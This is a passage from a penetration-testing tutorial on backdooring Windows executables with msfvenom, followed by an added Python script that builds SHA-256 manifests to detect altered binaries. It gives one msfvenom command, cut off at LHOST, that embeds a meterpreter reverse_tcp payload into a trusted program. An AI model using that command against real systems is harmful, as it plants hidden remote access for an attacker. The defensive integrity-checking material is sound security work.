Backdooring executable files
Backdooring is a method of bypassing normal security validation and maintaining persistent access to a system. The weakest link in any cyber espionage campaign is the human factor. Attackers typically embed the latest known or unknown exploit into a trusted executable and distribute it. In this section, we will dive into how one can leverage msfvenom to plant a backdoor in any executable.
msfvenom is a standalone payload generator that combines Metasploit's msfpayload and msfencode. As of June 8, 2015, msfvenom has replaced msfpayload. It was introduced to standardize the tooling and make it more efficient for penetration testers. It is installed by default in Kali Linux, and when you type msfvenom -h in the terminal, the following usage details should be displayed:
The following command will create clone_file.exe, carrying the reverse_tcp payload pointed at your IP address:
msfvenom -p windows/meterpreter/reverse_tcp -k -x original_file.exe LHOST...
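Because the technique above leaves the trusted program's behaviour intact, the practical defence is integrity checking of the binaries you ship or deploy. The following is an added example, not part of this book or of Metasploit: it builds a SHA-256 manifest of a directory and reports files that were modified, added or removed; the file names and contents are constructed stand-ins, not real PE files.

```python
import hashlib
import os
import tempfile

def sha256_of(path, chunk=1 << 16):
    """Return the hex SHA-256 of a file, read in chunks so large binaries are fine."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()

def build_manifest(root):
    """Map each relative file path under root to its SHA-256 (the trusted baseline)."""
    manifest = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            manifest[os.path.relpath(full, root)] = sha256_of(full)
    return manifest

def verify(root, baseline):
    """Compare the current tree against a baseline manifest.
    Returns sorted lists of modified, added and missing paths."""
    current = build_manifest(root)
    modified = sorted(p for p in baseline if p in current and current[p] != baseline[p])
    added = sorted(p for p in current if p not in baseline)
    missing = sorted(p for p in baseline if p not in current)
    return {"modified": modified, "added": added, "missing": missing}

def demo():
    """Constructed scenario: baseline two 'executables', then alter one and drop a new one."""
    with tempfile.TemporaryDirectory() as root:
        with open(os.path.join(root, "original_file.exe"), "wb") as f:
            f.write(b"MZ" + b"\x00" * 62)   # constructed stand-in, not a real PE
        with open(os.path.join(root, "helper.dll"), "wb") as f:
            f.write(b"MZ" + b"\x00" * 30)   # constructed stand-in
        baseline = build_manifest(root)
        # Simulate the template being altered in place while keeping its original bytes
        with open(os.path.join(root, "original_file.exe"), "ab") as f:
            f.write(b"\x90" * 16)           # constructed appended bytes
        with open(os.path.join(root, "clone_file.exe"), "wb") as f:
            f.write(b"MZ" + b"\x00" * 62)   # a new, unexpected binary
        return verify(root, baseline)

if __name__ == "__main__":
    print(demo())
```

Store the baseline manifest somewhere the deployed host cannot rewrite it, otherwise an attacker who replaces the binary can simply refresh the hashes as well.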